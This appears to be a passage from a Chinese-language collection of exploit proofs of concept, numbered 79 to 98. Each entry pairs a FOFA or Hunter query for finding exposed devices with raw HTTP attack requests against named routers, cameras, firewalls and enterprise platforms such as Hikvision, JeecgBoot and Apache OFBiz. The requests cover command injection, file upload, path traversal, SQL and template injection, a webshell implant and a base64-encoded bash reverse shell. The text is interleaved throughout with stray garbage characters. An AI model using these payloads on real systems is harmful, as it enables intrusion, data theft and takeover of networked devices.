$ h; d$ f) N2 C2 n. A2 G+ HYsOxWxSvj1KyZow1PTsh98fdu6l
0 j3 x1 R4 S3 b+ I' G( K( }# i------YsOxWxSvj1KyZow1PTsh98fdu6l" V- t0 O5 H% N2 r% T
Content-Disposition: form-data; name="target" O G( X9 ?& r* W" q( L% x
! q$ g8 L/ x" u9 j& F0 G
/Applications/SkillDevelopAndEHS/
4 m ~8 V% Q# o------YsOxWxSvj1KyZow1PTsh98fdu6l--
1 N* M" y- E0 J% X1 q6 a9 g) Q# o+ m# N! I% g8 j$ c. j
* R+ i* C. a; S% B8 X; u+ `
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
; x3 N* s1 p& W& PHost: x.x.x.x
( x: ~& N# r I' F5 r6 `/ r8 S" D' Z+ I v) V* M
4 _' s. g- o" b' R L4 t& i* |
79. BYTEVALUE 百为流控路由器远程命令执行
. N0 G+ G- s! Y6 h6 x( m$ aFOFA:BYTEVALUE 智能流控路由器; H5 O! I: |/ |9 P* I6 r* X
GET /goform/webRead/open/?path=|id HTTP/1.15 f1 l9 G; M1 B: X e `; g
Host:IP* t Z" p+ G+ @( u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
O- r+ M# }, w# h, wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ ~7 j4 {! S/ Y4 p! u% ~( s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ s- E) B1 [. k D. M B3 ?& B1 ]
Accept-Encoding: gzip, deflate+ d0 f/ z @2 Y6 V
Connection: close/ f( h9 v1 D+ G8 r4 c) F# H
Upgrade-Insecure-Requests: 1
1 o6 ?0 b1 T0 `% Q h) a
( W( ]3 {( M ]) ]5 f" \- h
( b% C/ E' o* t5 Y2 [* P80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传0 ~; Y. ]6 @: X! M# c( ?7 J
FOFA:app="速达软件-公司产品"
1 _' T; U7 c# [$ P; ^: yPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
& F9 k0 j [3 H( F FHost: x.x.x.x
; L4 n! V8 @' E8 R9 E& ?" Y0 o" X2 aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# e" f' V( X8 i5 |Content-Length: 27
6 J* n7 A- A2 t+ _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 r5 @% k& i2 p3 }
Accept-Encoding: gzip, deflate
9 ?6 r- ]- O% Q. S* YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' t/ ]* F' v2 W' r- ^" zConnection: close
: ^7 \. N6 E: LContent-Type: application/octet-stream3 }- M; @' w8 u0 g
Upgrade-Insecure-Requests: 1
0 w7 T' _# H/ z6 c5 ^; X4 M# D$ K, [1 `- L* \& Z, z
<% out.print("oessqeonylzaf");%>
! b+ v& I, E, M. w" T6 f4 B: i: w6 I9 P
* ~0 ~7 N5 ^9 ^8 x" U; j& h6 @GET /xykqmfxpoas.jsp HTTP/1.1
) ~" R3 e' T" }! e P. NHost: x.x.x.x3 T. C; P6 p9 J9 K$ U! A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 \+ @; h. ^8 H7 N+ x8 sConnection: close/ H( z" Y* `7 g- b+ j1 T) P. o, O
Accept-Encoding: gzip
# s$ @% h |1 K7 }6 w; t! C* U" Q! @4 o3 A
$ r7 H' L9 l5 Q" X! o$ r# N% @$ I81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
% A$ T/ q& W. j0 _FOFA:app="uniview-视频监控", s4 f. ?# t4 u1 j* G/ `) e% y, t
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
! |5 K$ U/ v* h# x! B* s7 [+ B9 ~6 MHost: x.x.x.x
7 D5 ~ z' V: XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) i" A3 c; K2 Z3 J$ g c( V/ F
Connection: close
% J! d P& h! Y, P( SAccept-Encoding: gzip
" b: D. v: H& j. E) b1 {% o6 g- M8 j1 k3 Q* D
1 \& d1 w* ?* n
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
& E9 Y: ^# R/ O) Y2 QFOFA:app="思福迪-LOGBASE"9 t& `4 i D+ t+ K
POST /bhost/test_qrcode_b HTTP/1.1# _! M0 ]# F: h+ o$ l
Host: BaseURL V; @" Y0 d4 U- k8 D7 d
User-Agent: Go-http-client/1.1
- b: i' ^' ~4 n- D5 C& F/ _& q E( IContent-Length: 23) Q6 k: X' g' m9 }) m1 a. {! z4 v
Accept-Encoding: gzip1 O- @+ w* C4 Z& s- X* l+ a
Connection: close, @% T: H4 J( C# Q$ v8 `
Content-Type: application/x-www-form-urlencoded
6 u) G+ h5 a i% yReferer: BaseURL) ]8 q: J/ m" R1 t/ Y+ m
! O& e6 W( K5 n
z1=1&z2="|id;"&z3=bhost
3 u: a2 p4 u' d1 f1 Q
: [6 U' `8 Z+ }4 ?: F3 Q* ~2 i- v# b
83. JeecgBoot testConnection 远程命令执行
! U4 ]) l4 h' j J" V1 b6 NFOFA:title=="JeecgBoot 企业级低代码平台"
t8 J# Q# }; b
7 ?9 u% M1 C; @# g' K, |( `5 i4 p8 o* h6 K9 ]
POST /jmreport/testConnection HTTP/1.1
2 B1 R7 E# p0 a$ oHost: x.x.x.x
3 L' Z6 U; q" x( i: r& bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% K/ |8 J. S8 t- C( X& qConnection: close% I2 o2 N0 _' K8 X, ?! w; l# e
Content-Length: 8881
/ H" [$ o7 v9 b3 A8 sAccept-Encoding: gzip6 _* W7 P7 e& |8 k3 a# `- Q
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
- N& r5 U0 u: K5 m- D' @5 m! JContent-Type: application/json! x& S' P: s3 I' l
" _2 c, b7 k. j: S3 _PAYLOAD: |; i: F+ O' U- U' D
' v% [4 E4 B/ u7 E
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
n6 C3 k, R9 Y kFOFA:title=="JeecgBoot 企业级低代码平台"
5 _% S, [) Y# g8 k% [$ r1 M% N7 T$ E8 k
8 r$ p3 x3 O9 h, `! | I i! _0 A m2 w* Y0 Q% N6 q) \# \
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
0 O8 E, q2 o2 C% c! [! F. QHost: 192.168.40.130:8080
7 D5 `' B- P \7 s$ VUser-Agent: curl/7.88.1
. H0 Q( @' Y2 n0 T/ IContent-Length: 156
; E' C- S y/ T- B8 |Accept: */*3 `5 y! _" P2 n _
Connection: close5 _5 Y9 z# p" a# O4 @# ?7 d# t
Content-Type: application/json
1 ]# R5 x% S7 G ^4 D& C% J( HAccept-Encoding: gzip; X6 ? o9 d' m* d
4 {% p6 q. C2 Q. Z* b( N
{+ K3 P, p! G* v7 ~: {2 ^) E
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
- i2 V: G' @7 c, K6 u h. D% P7 c "type": "0"
]$ ~7 E: a K}) c5 e* K W$ ~" n
8 P2 W2 E/ e. L6 u0 U' q- h/ O- c, E1 c* L. k
85. SysAid On-premise< 23.3.36远程代码执行& s' G. c) u: c k+ W* e
CVE-2023-47246
' e2 j+ x& G1 J7 PFOFA:body="sysaid-logo-dark-green.png"
4 {; |) L# Z& _3 }" ]8 P# |7 }EXP数据包如下,注入哥斯拉马
# K2 U; X$ a3 _2 gPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
) K8 j& V/ U+ ~Host: x.x.x.x
: Y5 q4 P# T3 J8 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 ~) `+ v$ |$ [# S# a7 N# T5 b; l% `7 m
Content-Type: application/octet-stream. @/ v6 X/ F$ U Q6 n+ ?
Accept-Encoding: gzip% H2 n9 g- @* B# o4 u" Q$ B
7 P7 n2 W r; E) L. KPAYLOAD
5 ^$ d& E1 J* Y( r# ^4 p& @
" \( V; U2 M* F, O1 ~# H/ o# Y回显URL:http://x.x.x.x/userfiles/index.jsp# n" M# o& F! s' @/ v
; `6 e8 E0 f5 X7 }86. 日本tosei自助洗衣机RCE: U; n) k0 {' d9 L
FOFA:body="tosei_login_check.php"- u r( E, `! N- w
POST /cgi-bin/network_test.php HTTP/1.1( E6 g- A5 S3 a. b
Host: x.x.x.x& y( V J, |6 W2 O
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36; ?, k4 g! T! u- b# F
Connection: close8 `, \8 ~' p- E
Content-Length: 449 a. N; }5 R# Q$ }6 J8 d
Accept: */*
1 D7 F; c1 f% OAccept-Encoding: gzip, ]3 u0 T e- J0 l; R U
Accept-Language: en* Y! D3 D- D4 g: m7 @& h
Content-Type: application/x-www-form-urlencoded
9 J: C, y; K0 n! \2 K
. U+ ]7 K6 u. B* F0 W+ Fhost=%0acat${IFS}/etc/passwd%0a&command=ping
( z/ x Y7 W( Z2 i7 [0 ^+ q9 I4 a* S4 }# t1 o' `. E
+ z( T' ^5 m2 H8 @# a) [9 s |$ x87. 安恒明御安全网关aaa_local_web_preview文件上传
4 O4 F3 ?# c o% j- V1 K+ fFOFA:title="明御安全网关"1 B, \, t) D. D h9 W" v
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
9 r- a1 m$ V" w- u; y I0 \$ IHost: X.X.X.X
% b3 O' e8 T" [3 g. c) t( hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* L% O+ M* @) X
Connection: close# I: J$ g& \, i; F9 O- R5 f
Content-Length: 198
+ K8 e7 O+ S9 u- gAccept-Encoding: gzip$ f! G7 C- {$ N( n2 K0 q% b; P
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd3 w9 g/ G+ _( v4 b |( ?5 B
$ O, w" c6 N( h& w+ E! `9 L
--qqobiandqgawlxodfiisporjwravxtvd' ?; a* L5 C) q/ z- [7 a! o2 ?
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php": f+ o1 o9 K9 P( n
Content-Type: text/plain: R9 e: J* w, G/ o. {
8 M! c/ ]" l% K& t2ZqGNnsjzzU2GBBPyd8AIA7QlDq M' i: k, e" L
--qqobiandqgawlxodfiisporjwravxtvd--; u1 i, J2 n$ L; p% B& H
% m: x) Y. b: P X
e; C* v( I, P4 l" j
/jfhatuwe.php0 Q9 e; q6 h, |
" c! ^+ `' n5 M" J, g- R% ?- i88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
+ w, c- |; a/ v) ~. nFOFA:title="明御安全网关"
* \: c8 ]. n- D h W5 V% M sGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.13 P! r: d8 M2 P+ O, Y( ]
Host: x.x.x.xx.x.x.x
7 }% m% a+ h3 o$ v w3 i% M4 Z; u- c: v" IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 d, y$ ~9 @5 w( kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! W6 o6 ?: T& D+ u! BAccept-Encoding: gzip, deflate
& X3 `& J% r+ W; `8 E) WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 Z, y! h; g H. s% L' G2 _Connection: close# F( j: @# F0 `" G* e; j
" _1 Y" U6 R& R
: a' W' T% b- k2 b/astdfkhl.php
. Y+ T+ ?. G# R& g9 c$ | ?( c7 z, A
! _$ k: J! @; s89. 致远互联FE协作办公平台editflow_manager存在sql注入* K g! ^" _ r/ `
FOFA:title="FE协作办公平台" || body="li_plugins_download"8 o, s0 s; o7 z3 y% ~7 v: C
POST /sysform/003/editflow_manager.js%70 HTTP/1.16 I9 I& Y# K8 f6 X( t/ F, t( ?
Host: x.x.x.x
2 W% e- p3 U: g& _8 x( BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! W- o, a5 e xConnection: close
& |. Z6 X! H, c; y* _' j }* rContent-Length: 419 S( e E8 U1 r: }; ?& t( h5 B' t) I* }" p
Content-Type: application/x-www-form-urlencoded
0 t( ]1 k% }% i' @ l. _6 H. nAccept-Encoding: gzip- ?* `1 C0 _; |, _" @( x
# \: G9 a5 v& i4 G% _3 f1 l4 r; moption=2&GUID=-1'+union+select+111*222--+& K- n J5 S ^6 [$ b, f6 Q
- b1 f' @! r3 @; P- |: z
% B D- z$ T6 I* b1 |) {90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行" j) l9 H0 k1 N
FOFA:icon_hash="-1830859634"6 `& a2 t+ Z0 k' p8 h' Q) n' g6 b
POST /php/ping.php HTTP/1.1& g/ h6 s( a1 F) i+ N- K, M
Host: x.x.x.x; o' m# G) Z! z! t: _+ s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
# O5 e4 c0 p3 V9 U OContent-Length: 514 b" e- `% {# s3 Y
Accept: application/json, text/javascript, */*; q=0.01
$ `6 v; ~1 ~) W4 BAccept-Encoding: gzip, deflate
8 e% f ^1 V8 l0 n. KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( ]9 s# _6 C$ a/ V" B
Connection: close
( N. }7 B3 F* ~* A6 U" F8 ^Content-Type: application/x-www-form-urlencoded3 w4 I2 u+ t4 v5 C) o! N+ c
X-Requested-With: XMLHttpRequest1 G2 ^' G; T% v0 A
- n" f1 n4 ^8 H, J! Z5 vjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
5 P; l( `" S, i$ n) E$ ?1 b0 [- i& q+ I9 y! w8 `# v: L
o' x" B7 A2 C0 b7 a
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
" J! P1 m+ W3 n9 C1 @+ e2 ?9 cFOFA:title="综合安防管理平台"
6 W- ]' k* {1 N* u5 o1 N: OGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
7 ]' I- ]- q6 @2 e8 rHost: your-ip
5 ^5 t: U( |# w2 C& K1 V, U x3 g F; [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
( e. t' K! L$ \1 bAccept-Encoding: gzip, deflate( ^4 l# K% |7 l$ {4 p! g8 w
Accept: */*! L' _5 q+ c* k0 P* d
Connection: keep-alive
/ r/ @2 Y! u6 L! C: P
8 s: W8 V: k2 S5 s9 G2 e' q1 k" o/ d6 X* [- N
8 ~* I& b& [5 P0 H3 ]' k& |! ?92. 海康威视运行管理中心session命令执行
% Q/ g, ^5 g+ d. y: q- J* }- WFastjson命令执行9 L: B$ \; {+ ]% k$ W4 E
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"6 A$ n4 Q& X4 L9 l
POST /center/api/session HTTP/1.1
4 j, A3 u5 \0 R5 B% m7 y j9 eHost:: p$ s/ T j5 S" ^% D
Accept: application/json, text/plain, */*( U. r5 U! Q; T# X! ?; Y$ u* \
Accept-Encoding: gzip, deflate& g* i X% A# o R7 \
X-Requested-With: XMLHttpRequest- a7 N* x, Z3 [% a) H" e& ~
Content-Type: application/json;charset=UTF-8
! Y7 P+ G2 f& XX-Language-Type: zh_CN& K7 ]- b5 i( ~8 v
Testcmd: echo test
6 v I& m9 W/ X$ OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
( U8 Q6 F: Q$ mAccept-Language: zh-CN,zh;q=0.9# T$ ^& D9 n& ~, |$ o4 T
Content-Length: 5778( g+ c; n9 O% w0 b. Z' h
5 U1 U) Y! C7 v! D8 u f. V0 b% m
PAYLOAD
5 A) V# S3 A1 X4 [# l9 Z( T8 o$ l: S0 _# j- Y/ t5 z( u
: G T8 f1 K$ Q, B93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传1 ]! k1 F' e# c1 Z7 u
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="& r& a2 ~. K t7 i2 v& o' J: J% a0 V
POST /?g=app_av_import_save HTTP/1.1
1 U/ m$ u8 z! q. n. `Host: x.x.x.x! S7 m/ z7 W: c
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
f& L9 F1 Z7 _. f- w, E- j# TUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36. e: k% v" s2 L8 N
9 S6 P! Z D( b7 U
------WebKitFormBoundarykcbkgdfx$ b5 n4 C8 b9 \2 ?2 \9 f
Content-Disposition: form-data; name="MAX_FILE_SIZE"
- B# o! i& |, e$ P, F6 }
& M* u' {9 c: ?1 n, b10000000* m3 A) O m! N- d( a5 T/ A* y
------WebKitFormBoundarykcbkgdfx3 d# \) h2 R/ a, J: u
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
4 t4 R; Y0 v+ A/ AContent-Type: text/plain' }' v5 d6 v% ]8 s! y/ Y
) D! ~* ?# y- Z# w. x& i
wagletqrkwrddkthtulxsqrphulnknxa2 O- \0 X* \8 i' m# Q
------WebKitFormBoundarykcbkgdfx
' S; W# Z* i: }; f+ J8 m+ P3 ^Content-Disposition: form-data; name="submit_post"
9 {0 ]0 a& @5 A; V* L+ @
2 k- p! n, @5 {% vobj_app_upfile
; h7 K& {4 v1 t, I% O------WebKitFormBoundarykcbkgdfx
8 W5 p8 X! k) ^5 J6 m, SContent-Disposition: form-data; name="__hash__") X# [3 F+ N+ v9 C6 w" {
2 p9 `- |8 d& M9 ?
0b9d6b1ab7479ab69d9f71b05e0e9445
8 L6 O% X. Q: e4 ]1 y* ?4 D, T5 @------WebKitFormBoundarykcbkgdfx-- ^7 t. c( C7 b. M( F8 n0 h! Y
" o& y) {8 V, g ]5 h
1 b! d, L! w0 S$ j, X
GET /attachements/xlskxknxa.txt HTTP/1.14 L( Q2 ^- G) |# ~/ w
Host: xx.xx.xx.xx
8 N: F3 s9 [* {0 `7 @* lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* L9 P) B5 k3 @ r! A- G$ F/ n# W
' J, U6 B: l& ^, e2 p; l+ z% v. f ?& L% |
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传# j: L/ K5 _; {- q% f+ T5 S
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg==": I2 Q9 s3 m! b# V( u3 q
POST /?g=obj_area_import_save HTTP/1.10 u! K+ l" j. a" e
Host: x.x.x.x
7 t9 W0 k( {8 b) {4 R! @$ y, hContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
/ k* P' T+ v, _ X4 g' B5 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36& @% q& e$ T5 E6 B
; V1 W/ R3 Y# O/ F/ I- V------WebKitFormBoundarybqvzqvmt
& x' U3 J7 l; K, s% r' w8 z H' xContent-Disposition: form-data; name="MAX_FILE_SIZE"# j5 S4 l( e- ?: P1 Z
6 X6 E; |, l3 ^' t* `) V8 b( p10000000, R- P5 b6 Y2 b0 Q: m
------WebKitFormBoundarybqvzqvmt
, ` `" s7 Q) ]5 IContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt") Y: u& [# |: j+ ~
Content-Type: text/plain
+ G- f; w! K) \) y! B( X
! I3 g" Q8 d9 N6 U7 P- Ppxplitttsrjnyoafavcajwkvhxindhmu
+ h% c, o+ U8 }# ?6 U2 o------WebKitFormBoundarybqvzqvmt
+ e, |" ?) R+ B. qContent-Disposition: form-data; name="submit_post"
$ d$ S4 u4 s6 U/ X. z- m ]1 g$ \/ ]0 D) c: k
obj_app_upfile; O+ `1 t- p7 ^6 h% [/ C1 F2 o
------WebKitFormBoundarybqvzqvmt
9 }- S7 X* m) U4 p) d$ H' A. S- mContent-Disposition: form-data; name="__hash__"/ B1 i) @* |/ _4 B, q3 X
+ ]3 O% @. R+ q7 ~
0b9d6b1ab7479ab69d9f71b05e0e9445
" J" W% p7 z* j/ o------WebKitFormBoundarybqvzqvmt--
, U: r6 e. G( ~6 d f
# I( s5 L6 v& F% k1 i. e1 L9 {; l% }) a9 `' ~ ^1 T
8 g8 X* o3 A- P% _0 k/ F2 a
GET /attachements/xlskxknxa.txt HTTP/1.1
9 C5 M d: v1 ~7 P# U# Y& {' NHost: xx.xx.xx.xx
* @8 W# P* i+ \3 |# cUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 R' V3 @2 j2 U! T' R1 R7 e
2 ?$ U, o1 O1 h& k! ~: V5 e. Z/ V. E/ w& J8 d& Y+ w7 U
# h; R2 f# ]% T& M, F! s' D# ]95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行5 ^6 }$ ]% o- U
CVE-2023-49070" P- F a" U c( V
FOFA:app="Apache_OFBiz"
6 C- ^( @; W4 gPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
5 H8 Z& r1 m! A, v6 vHost: x.x.x.x1 C# k+ |5 O- N+ }
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
+ q& M& P4 t; I; q5 c3 g0 O/ jConnection: close
! h7 }( I& _" CContent-Length: 8892 ~) z0 ^8 T, r# D
Content-Type: application/xml
, b8 M6 h( j3 zAccept-Encoding: gzip- {- m# T+ x. J# S
+ Q7 y0 I+ [: N& C<?xml version="1.0"?>
! a8 Y- x( B0 `3 U9 a% _<methodCall>! j+ s I. g& P% v% b2 K
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>4 `0 y% H. V- I) {) }; q* C& A
<params>; j, I' {+ S/ I9 B: G
<param>- Y$ l! S" D, {3 _! Q5 e
<value>/ M* A; D( E9 |1 y+ X' W0 f8 J) {
<struct>
4 H: ^3 m4 l6 P! B% x7 ` <member>) @- X" P. Y% `5 K% A; o O
<name>test</name>2 [* Q2 F# ^1 s0 H* B; a3 Y) Y( z! W [
<value>/ H9 F# C6 y; e( F" K
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
; x& w* \! }1 a% Q, W4 @0 C </value>
* E# C' \; G) K2 h) m, b. v </member>
" ^% Z4 u& R2 v4 B' B, X </struct>
; y# ]; R7 K+ J1 _) J1 I8 @ </value>" i5 M6 c0 v1 Q P3 l8 o
</param>( V4 F1 |& t' {. N! s" e! |( s7 D9 X
</params>; Y4 C \4 S$ Z5 u& b2 R* ?2 `- d6 z. p
</methodCall>* P0 N t0 |; v5 j% D d
% q1 P/ W* J5 K2 v
, V {6 f5 y& V% T用ysoserial生成payload
' A( t/ N/ c$ H" L& djava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
' B) t) }( L$ Y0 f+ ]3 Q9 C! \& I4 \/ z5 g
2 ^' ^" D+ g3 h0 U: w3 f+ X
将生成的payload替换到上面的POC- y+ }/ q% n4 C8 \! T& k
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
# s# ~" l' K- g$ GHost: 192.168.40.130:8443
+ K/ b F' K2 e' W8 ZUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
% A6 ?; M5 W. hConnection: close- c" ]7 }' i# _7 i- c
Content-Length: 889) s7 q$ R% o5 Y+ b( F& R
Content-Type: application/xml
) ~6 G' o+ I! B9 YAccept-Encoding: gzip, V: x* c' X% d
k" F$ ]; q7 |1 A. X% F2 OPAYLOAD; G9 Q/ v/ `$ g }9 q! ~/ R
3 {/ ~+ d' g" r' ?
96. Apache OFBiz 18.12.11 groovy 远程代码执行
8 w$ j9 U+ z6 AFOFA:app="Apache_OFBiz" }+ x4 j+ k! x9 Y: X$ g
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1! V# \+ G; `5 q. M5 V% w
Host: localhost:8443
( o4 T# @; p0 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0& s% {$ C& r) Q) R
Accept: */*' ?4 t- I6 d* B# X8 U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 {( |% A1 E; G/ {$ O
Content-Type: application/x-www-form-urlencoded7 {/ c2 l4 Z$ t; x" G( @4 L
Content-Length: 55
$ d" R) [1 C. A* O/ w( o7 r
: K& _" M3 b( R- x5 XgroovyProgram=throw+new+Exception('id'.execute().text);& O9 X& P: \5 r. p, l# y
1 b3 q( |- m8 }! W- P; w
) f" R" ?4 n G. V. y A* s反弹shell: u" |6 y+ \ ~( \- S5 H$ d
在kali上启动一个监听
! J9 n# r5 _; q& r9 _nc -lvp 7777
% K [! B9 k+ u; s" S' o) T' H2 m( v% f3 I' U& ]
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1) P1 r4 v; R2 e; b, p
Host: 192.168.40.130:84432 n9 C$ c& k8 Z. H2 I/ ^4 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0# U O+ Q0 P, @2 R
Accept: */*2 V+ {: D S- H5 u# q8 i/ q: O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; |' W( H3 {6 C& V8 r2 n$ C) CContent-Type: application/x-www-form-urlencoded
* l F r+ A+ P! \6 A5 d" lContent-Length: 71
2 j4 T- Q) D: {# x9 o) m; J7 L r0 t
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();5 j$ Y9 P7 p& M5 Y! M- V
7 ?$ @9 F' A- f
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行1 U8 N( r2 }5 u- D$ u1 G% W3 [
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
5 ~% R8 q8 j# g* P; Q9 L0 U: a* ?GET /passport/login/ HTTP/1.1
. P, \" F* X) k# tHost: 192.168.40.130:80855 V# e" `7 @# ^' {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 D3 h, e- c! J( l) t7 M3 B
Accept-Encoding: gzip' v$ L2 {5 R* f `+ w: P5 ?0 B& }
Connection: close5 E! t! F: Z- u3 V5 f
Cookie: rememberMe=PAYLOAD( B @9 A4 `, Z5 M! o
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk". }. C1 W( e: s2 I- w( d. H0 o7 N
1 T. J: D! T9 E8 S
8 S* a N$ \* x, \% g98. SpiderFlow爬虫平台远程命令执行
0 d& X) [* v; wCVE-2024-0195" I% b; c0 D# t( I9 q. v/ V5 D
FOFA:app="SpiderFlow"
6 Q* }$ W. {1 Y: E7 d8 _" b4 D) @POST /function/save HTTP/1.1, L- c8 |: f" w# [" p7 l& C [8 K2 V
Host: 192.168.40.130:8088
. C& X0 A! @$ `+ {, d8 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0% u" n x7 k- U+ |6 I0 {2 {; H6 N8 j
Connection: close: r! u+ I; m' O' D& W
